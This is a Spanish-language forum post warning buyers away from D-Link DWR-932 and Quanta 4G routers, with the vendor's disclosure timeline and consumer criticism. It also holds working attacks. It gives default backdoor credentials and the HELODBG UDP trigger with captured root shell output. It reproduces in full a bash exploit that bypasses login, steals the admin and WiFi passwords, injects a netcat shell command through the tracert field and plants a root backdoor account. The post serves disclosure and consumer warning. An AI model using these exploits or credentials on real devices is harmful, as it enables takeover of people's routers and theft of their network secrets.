El libre pensamiento para un internet libre
No estas registrado.
- Temas: Activo | Sin respuesta
Anuncio
#1 03-10-2016 22:06:24
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 4,762
D-Link WiFi+4G: Unos productos a evitar
Múltiples brechas de seguridad criticas en la gama "quanta router" y los DWR-932
Acabo de publicar un tema sobre el PIN WPS genérico de la gama de CPE WiFi+4G propuesta por D-Link: Todo sobre el Pin generico de los D-Link DWR-932 y Quanta 4G-WiFi
La brecha WiFi es solo una parte del desastre generalizado.
Hay tres avisos de seguridad sobre estos modelos, cada aviso incluye varias brechas de seguridad criticas:
Multiple vulnerabilities found in the Dlink DWR-932B (backdoor, backdoor accounts, weak WPS, RCE ...) de Pierre KIM @ Pierre kim/ Git Hub
Multiple vulnerabilities found in Quanta LTE routers (backdoor, backdoor accounts, RCE, weak WPS ...) de Pierre KIM @ Pierre kim / Git Hub
D-Link DWR-932 Firmware <= V4.00 Authentication Bypass - Password Disclosure de Saeed reza ZAMANIAN @ PacketStorm
Afectan estos routers
- Quanta 4G WiFi Router QDH
- Quanta 4G WiFi Router UNE
- Quanta 4G WiFi Router MOBILY (QDH-Mobily - CPE342X)
- Quanta 4G WiFi Router Yoomee
- El router portátil D-Link DWR-932
Varias Puertas traseras
Podemos hablar por ejemplo del DWR-932.
Tiene el servicio telnet y ssh habilitado por defecto (sin que el usuario este advertido) con dos cuentas.
Sus credenciales son muuuuuy originales.
admin:admin
root:1234
Hay que ser un maestro de la ingeniería social para encontrarlos 
Es un buen ejemplo para ilustrar la magnitud de la catástrofe.
Hay backdoor mas sofisticadas como esta:
If a client sends "HELODBG" to the router, the router will execute
`/sbin/telnetd -l /bin/sh`, allowing to access without authentication
to the router as root.
Esta si que es original, esto no lo podemos negar: Es possible abrir una consola root mandando la palabra HELODBG sobre el puerto 39889
La mandamos
[email protected]:~$ echo -ne "HELODBG" | nc -u 192.168.1.1 39889
Hello
^CParramos el proceso (estamos autenticados) y podemos ahora lanzar un sesión telnet sin tener que entrar los credenciales:
[email protected]:~$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
OpenEmbedded Linux homerouter.cpe
msm 20141210 homerouter.cpe
/ # id
uid=0(root) gid=0(root)Chapeau D-Link!
Varias formas de ejecutar comandos arbitrariamente para tomar el control remoto del equipo
Podéis admirar este pequeño exploit en bash que
- Se salta los credenciales para entrar en la interfaz
- Obtiene los credenciales de administrador con el infoleak
- Prepara el terreno para realizar de una "petición en sitios cruzados" (CSRF token)
- Habilita una puerta trasera con privilegios root
- Crea una cuenta ssh para el manejo remoto del dispositivo
- Para finalmente conectarse mediante servicio ssh con la cuenta que dispone de todos los privilegios requeridos recién creada,
#!/bin/sh
TMP_DIR=$(mktemp -d)
echo -n "Stage [1] - Bypassing authentication ..."
wget -qO${TMP_DIR}/stage1-axx 'http://192.168.1.1/data.ria?CfgType=get … ile=system'
wget -qO${TMP_DIR}/stage1-wifi 'http://192.168.1.1/data.ria?CfgType=get … &file=wifi'
wget -qO${TMP_DIR}/stage1-network 'http://192.168.1.1/data.ria?DynUpdate=up_5s'echo " OK"
echo -n " local admin = "
http_login=$(grep web_usrname ${TMP_DIR}/stage1-axx | tail -n 1 | sed -e 's#"##g;s#=# #' | awk '{ print $2 }')
echo $http_login
echo -n " local passw = "
http_password=$(grep web_passwd ${TMP_DIR}/stage1-axx | tail -n 1 | sed -e 's#"##g;s#=# #' | awk '{ print $2 }')
echo $http_password
echo -n " wifi access point = "
grep ssid ${TMP_DIR}/stage1-wifi | head -n 1 | sed -e 's#"##g;s#=# #' | awk '{ print $2 }'
echo -n " wifi password = "
grep wpa_passphrase= ${TMP_DIR}/stage1-wifi | head -n 1 | sed -e 's#"##g;s#=# #' | awk '{ print $2 }'
echo -n " WPS PIN = "
grep enrollee_pin ${TMP_DIR}/stage1-wifi | sed -e 's#"##g;s#=# #' | awk '{ print $2 }'
echo -n " guest wifi access point = "
grep ssid ${TMP_DIR}/stage1-wifi | tail -n 1 | sed -e 's#"##g;s#=# #' | awk '{ print $2 }'
echo -n " guest wifi password = "
grep wpa_passphrase= ${TMP_DIR}/stage1-wifi | tail -n 1 | sed -e 's#"##g;s#=# #' | awk '{ print $2 }'echo -n " public ip = "
json_xs -t json-pretty < ${TMP_DIR}/stage1-network | sort | grep ip | head -n 2 | tail -n 1 | sed -e 's#"##g;s#,##' | awk '{ print $3 }'
echo -n " gateway = "
json_xs -t json-pretty < ${TMP_DIR}/stage1-network | sort | grep gateway | head -n 2 | tail -n 1 | sed -e 's#"##g;s#,##' | awk '{ print $3 }'
echo -n " subnet mask = "
json_xs -t json-pretty < ${TMP_DIR}/stage1-network | sort | grep subnet_mask | head -n 2 | tail -n 1 | sed -e 's#"##g;s#,##' | awk '{ print $3 }'
echo -n " dns server #1 = "
json_xs -t json-pretty < ${TMP_DIR}/stage1-network | sort | grep dns1 | head -n 2 | tail -n 1 | sed -e 's#"##g;s#,##' | awk '{ print $3 }'
echo -n " dns server #2 = "
json_xs -t json-pretty < ${TMP_DIR}/stage1-network | sort | grep dns2 | head -n 2 | tail -n 1 | sed -e 's#"##g;s#,##' | awk '{ print $3 }'echo
echo -n "Stage [2] - RCE ..."
http_login=$(echo $http_login | tr -d '\r')
http_password=$(echo $http_password | tr -d '\r')
http_session=$(wget -qO/dev/null --server-response --post-data="uname=$http_login&passwd=$http_password" http://192.168.1.1/login.cgi 2>&1 | grep Cooki | awk '{ print $2 }')
http_csrf_token=$(wget -qO- --header="Cookie: ${http_session=}" "http://192.168.1.1/data.ria?token=1")
wget -qO/dev/null --header="Cookie: ${http_session}" --post-data="{\"CfgType\":\"tracert\",\"cmd\":\"tracert\",\"url\":\"\`/bin/nc -l -p 1337 -e /bin/ash\`\",\"authID\":\"${http_csrf_token}\"}" "http://192.168.1.1/webpost.cgi"
echo " OK"
echo "Stage [3] - Checking the router ... OK"
(echo id; echo echo "backdoor:htEcF9TWn./9Q:0:0:backdoor:/:/bin/sh >> /etc/passwd" ; echo exit) | nc 192.168.1.1 1337
echo -n "Stage [4] - Creating a backdoor account ..."
echo " OK"
echo "Stage [5] - Connecting as backdoor/admin to the remote sshd ..."
echo
echo "Have fun!"
echo
expect -c 'set timeout 3; spawn ssh [email protected]; expect "password: $"; send "admin\r"; interact'
En la proximna versión se hará tambien la colada. 
Respuesta lamentable por parte de D-Link
Se podría excusar unos fallos tan groseros si se corigierán
El problema es que desde D-Link han dejado muy caro que nos será el caso si miramos el "Time line" (la cronología) de los "full dicslosures"
## Report Timeline
* Dec 04, 2015: Vulnerabilities found by Pierre Kim in Quanta routers.
* Apr 04, 2016: A public advisory about Quanta routers is sent to
security mailing lists.
* Jun 09, 2016: Pierre Kim is contacted by Gianni Carabelli about
Dlink DWR-932 router's similarities to Quanta routers.
* Jun 14, 2016: Pierre Kim thanks Gianni Carabelli and says he will
contact Dlink.
* Jun 15, 2016: Dlink is contacted about vulnerabilities in the
DWR-932 router (=~ 20 vulns).
* Jun 16, 2016: Dlink Security Incident Response Team (William Brown)
acknowledges the receipt of the report and says they will provide
further updates.
* Jul 09, 2016: Pierre asks for updates.
* Jul 09, 2016: Dlink says they will have correction by July 15.
* Jul 19, 2016: Pierre asks for updates.
* Aug 19, 2016: Pierre asks for updates.
* Sep 12, 2016: Pierre asks for updates and says he will soon release
an advisory as 90 days have passed without news.
* Sep 12, 2016: [email protected] is contacted to get pieces of advice
about the disclosure.
* Sep 13, 2016: CERT recommends to try to contact D-link and to
publish the advisory.
* Sep 13, 2016: Dlinks says they don't have a schedule for a firmware
release. Customers who have questions should contact their
local/regional D-Link support offices for the latest information.
support.dlink.com will be updated in the next 24 hours.
* Sep 28, 2016: A public advisory is sent to security mailing lists.
* El autor ha comunicado las casi 20 vulnerabilidades a D-Link el 15 de junio 2016 y se le ha respondido enseguida (día 16) diciendo que se iba a hacer una actualización de seguridad
* Tras esperar tres meses Pierre KIM ha amenazado con hacer publicas las brechas si D-Link no hacía nada en un plazo de 90 diás.
Son 3 meses más, lo que les dejaba en total 6 meses para arreglar estos fallos
* ¿6 meses para arreglar un firmware?
Es demasiado difícil para D-Link y tiran la toalla. 
El cliente se puede ir a freír espárragos si quiere un router seguro: Ninguna actualización de seguridad al horizonte.
Absolutamente vergonzoso.
Sobre todo por parte de una marca "con pretensiones" que nos hace pagar una "supuesta" cualidad
Por ejemplo el DWR-932 se compra alrededor de 120€ en mediamarket (si lo compras si que eres tonto)
102€ + la IVA = superamos los 120€
El precio de una router Aafa ac1200... ¡Alucinante!
Y es mucho más que lo que cuestan modelos similares de otras marcas y sin tantas brechas de seguridad
He presentado en el foro Huawei un router 4G WiFi portátil que cuesta unos 80€ (que no son pocos) para un nivel de prestaciones más que comparable .
Los routers WiFi + 4G de D-Link no son unos routers: Son unos enormes agujeros de seguridad con antenas.
¡Es un timo; son inseguros!¡No los compras!
Desconectado
Anuncio
Temas similares
| Tema | Respuestas | Vistas | Ultimo mensaje |
|---|---|---|---|
| 109 | 101568 | Hoy 16:08:11 por uga_uga | |
|
Vulnerabilidad WPA con Sagecom [email protected] 5260 por jorose1987
|
2 | 188 | Ayer 20:46:39 por yojanon |
| 0 | 45 | Ayer 19:59:55 por Pakalkin | |
|
Pegado: |
412 | 129214 | 18-03-2019 11:01:04 por Patcher |
|
A los que habeis probado la AWUS1900 por powermi
|
1 | 87 | 17-03-2019 12:15:44 por kcdtv |
Información del usuario
Ultimo usuario registrado: uga_uga
Usuarios registrados conectados: 0
Invitados conectados: 17
Estadisticas de los foros
Número total de usuarios registrados: 1,426
Número total de temas: 1,286
Número total de mensajes: 13,145
Atom tema feed - Impulsado por FluxBB
